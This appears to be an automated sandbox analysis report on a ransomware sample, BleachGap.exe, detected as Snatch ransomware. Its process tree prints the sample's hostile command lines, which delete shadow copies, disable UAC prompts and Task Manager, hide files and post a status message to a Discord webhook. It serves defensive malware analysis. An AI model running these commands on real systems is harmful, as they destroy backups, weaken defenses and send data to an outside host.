Play interactive tour

Edit tour

Analysis Report BleachGap.exe

Overview

General Information

Sample Name:	BleachGap.exe
Analysis ID:	352865
MD5:	015bb16ddcbf8a6326ec859020466c05
SHA1:	f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
SHA256:	c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
Tags:	filecoderloaderransomwareriskware
Most interesting Screenshot:

Detection

Snatch Ransomware

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Delete shadow copy via WMIC

Yara detected Ransomware_Generic

Yara detected Snatch Ransomware

Binary is likely a compiled AutoIt script file

Deletes shadow drive data (may be related to ransomware)

Disables the Windows task manager (taskmgr)

Drops PE files to the startup folder

May disable shadow drive data (uses vssadmin)

Uses cmd line tools excessively to alter registry or file data

Yara detected BatToExe compiled binary

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected AESCRYPT Tool

Yara detected DiscordSendWebhook Tool

Classification

Startup

System is w10x64

BleachGap.exe (PID: 3292 cmdline: 'C:\Users\user\Desktop\BleachGap.exe' MD5: 015BB16DDCBF8A6326EC859020466C05)

cmd.exe (PID: 4472 cmdline: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 912 cmdline: wmic shadowcopy delete MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

vssadmin.exe (PID: 1276 cmdline: vssadmin delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)

reg.exe (PID: 6080 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 2100 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 3112 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4064 cmdline: REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64 MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 2796 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 6020 cmdline: REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

attrib.exe (PID: 912 cmdline: attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)

attrib.exe (PID: 1276 cmdline: attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

attrib.exe (PID: 6084 cmdline: attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

BleachGap.exe (PID: 3492 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe' MD5: 015BB16DDCBF8A6326EC859020466C05)

cmd.exe (PID: 4180 cmdline: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WMIC.exe (PID: 4436 cmdline: wmic shadowcopy delete MD5: EC80E603E0090B3AC3C1234C2BA43A0F)

vssadmin.exe (PID: 2436 cmdline: vssadmin delete shadows /all /quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)

reg.exe (PID: 5624 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4944 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5472 cmdline: REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5936 cmdline: REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64 MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 4816 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

reg.exe (PID: 5472 cmdline: REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f MD5: E3DACF0B31841FA02064B4457D44B357)

attrib.exe (PID: 6156 cmdline: attrib +r +s +h +a +i 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

attrib.exe (PID: 6184 cmdline: attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

attrib.exe (PID: 6212 cmdline: attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe' MD5: FDC601145CD289C6FBC96D3F805F3CD7)

DiscordSendWebhook.exe (PID: 6260 cmdline: 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K MD5: FB7A78F485EC2586C54D60D293DD5352)

powershell.exe (PID: 6576 cmdline: powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden MD5: 95000560239032BC68B4C2FDFCDEF913)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
autoit	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
autoit	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	JoeSecurity_AESCRYPTTool	Yara detected AESCRYPT Tool	Joe Security
C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	JoeSecurity_AESCRYPTTool	Yara detected AESCRYPT Tool	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.209880773.0000028936510000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000016.00000002.229538128.0000021CA1C14000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.291791173.0000028CAE874000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000002.250772116.0000000000BFD000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
0000001A.00000002.237073796.000001F542870000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000003.290262642.0000028CC8801000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000C.00000002.214873488.00000198B6224000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000002.224603355.00000232B79A0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.292108463.0000028CAE923000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000002.224615954.00000232B79D0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000C.00000002.214867220.00000198B6220000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425889191.0000000002767000.00000004.00000040.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000014.00000002.224607469.00000232B79A4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000002.224599691.00000232B7980000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.549484552.0000000000B40000.00000004.00000001.sdmp	JoeSecurity_AESCRYPTTool	Yara detected AESCRYPT Tool	Joe Security
00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.550028845.0000000002790000.00000004.00000040.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000015.00000002.228657668.000002264DB20000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000006.00000002.204799183.00000220B20E0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001D.00000002.242656801.0000021C508D4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000003.283432554.0000028CC8A25000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000003.250316989.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
00000025.00000002.291773118.0000028CAE870000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425874542.0000000002870000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000015.00000002.228672912.000002264DB28000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.206125663.00000258A5910000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000017.00000002.232578649.00000291A8090000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000006.00000002.204762520.00000220B1DF6000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001B.00000002.238957668.000002084EBE0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000003.250284851.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.549851514.0000000002590000.00000004.00000040.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000018.00000002.235387887.000002154B140000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000003.249588574.0000000000BFD000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
00000003.00000002.203556300.00000172CC1B0000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000016.00000002.229530102.0000021CA1C10000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425898742.0000000000810000.00000004.00000040.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000022.00000002.250933814.00000000017D0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.211375187.000002567D7F0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000018.00000002.235350187.000002154B000000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000003.224188278.00000232B7A1F000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.292271084.0000028CAE949000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.209683392.0000028936250000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000B.00000002.213282265.000002899B580000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000B.00000002.213129651.000002899B2D0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.306884834.0000028CC8801000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000002.250648318.0000000000A80000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001D.00000002.242662946.0000021C508E0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.550041305.0000000002797000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000006.00000002.204757687.00000220B1DF0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001D.00000002.242643116.0000021C508D0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000000.00000002.549865164.00000000025A0000.00000004.00000001.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000008.00000002.208226382.000001EFEBD84000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000003.00000002.203003347.00000172CA3E0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000C.00000002.214879842.00000198B6240000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.307142020.0000028CC8A20000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000008.00000002.208231540.000001EFEBDF0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001A.00000002.237108856.000001F5429B0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001B.00000002.239006253.000002084EDC4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.205843003.00000258A5660000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.211500104.000002567DA30000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000018.00000002.235395727.000002154B144000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001B.00000002.238995782.000002084EDC0000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000003.00000002.202876581.00000172CA1D9000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000B.00000002.213298230.000002899B584000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425881894.0000000002760000.00000004.00000040.sdmp	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
00000017.00000002.233263410.00000291A8424000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000015.00000002.228650813.000002264DAF0000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000006.00000002.204803949.00000220B20E4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000003.224240165.00000232B7A0A000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000003.00000002.203007148.00000172CA3E4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000025.00000002.292313796.0000028CAE952000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000001A.00000002.237124909.000001F5429B4000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000017.00000002.233220564.00000291A8420000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.206146430.00000258A5914000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.209894285.0000028936514000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000006.00000002.204817158.00000220B3700000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000003.224208445.00000232B79E3000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000015.00000002.228739807.000002264DD60000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000011.00000003.425794983.0000000002770000.00000004.00000001.sdmp	JoeSecurity_AESCRYPTTool	Yara detected AESCRYPT Tool	Joe Security
00000014.00000002.224657271.00000232B7A17000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000016.00000002.231285225.0000021CA1E10000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000015.00000002.228747289.000002264DD64000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000002.250683901.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
00000008.00000002.208221509.000001EFEBD80000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000002.548470257.00000214BE7C1000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000002.224620941.00000232B79D6000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.211507385.000002567DA34000.00000004.00000040.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000002.250579104.00000000003A0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000003.250235856.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
00000003.00000002.202871401.00000172CA1D0000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000002.250655924.0000000000A89000.00000004.00000020.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000014.00000003.224251756.00000232B7A16000.00000004.00000001.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000022.00000003.250211441.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
Process Memory Space: reg.exe PID: 4064	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: BleachGap.exe PID: 3292	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: BleachGap.exe PID: 3292	JoeSecurity_Ransomware_Generic	Yara detected Ransomware_Generic	Joe Security
Process Memory Space: BleachGap.exe PID: 3292	JoeSecurity_AESCRYPTTool	Yara detected AESCRYPT Tool	Joe Security
Process Memory Space: BleachGap.exe PID: 3292	JoeSecurity_Snatch	Yara detected Snatch Ransomware	Joe Security
Process Memory Space: reg.exe PID: 3112	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 5936	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: WMIC.exe PID: 912	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 2100	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 5624	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: powershell.exe PID: 6576	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 4816	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: WMIC.exe PID: 4436	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 6020	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 5472	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: DiscordSendWebhook.exe PID: 6260	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: DiscordSendWebhook.exe PID: 6260	JoeSecurity_DiscordSendWebhookTool	Yara detected DiscordSendWebhook Tool	Joe Security
Click to see the 110 entries

Sigma Overview

System Summary:

Sigma detected: Delete shadow copy via WMIC

Show sources

Source: Process started

Author: Joe Security: Data: Command: wmic shadowcopy delete, CommandLine: wmic shadowcopy delete, CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4472, ProcessCommandLine: wmic shadowcopy delete, ProcessId: 912

Sigma detected: Hiding Files with Attrib.exe

Show sources

Source: Process started

Author: Sami Ruohonen: Data: Command: attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe, CommandLine: attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe, CommandLine|base64offset|contains: jk, Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4472, ProcessCommandLine: attrib +r +s +h +a +i C:\Users\user\Desktop\BleachGap.exe, ProcessId: 912

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	Metadefender: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\extd.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\1C7E.tmp\aescrypt.exe	ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	Metadefender: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\extd.exe	ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	Metadefender: Detection: 20%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe	ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Show sources

Source: BleachGap.exe

Virustotal: Detection: 42%

Perma Link

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\BleachGap.exe	Unpacked PE file: 0.2.BleachGap.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Unpacked PE file: 17.2.BleachGap.exe.400000.0.unpack

Uses 32bit PE files

Show sources

Source: BleachGap.exe

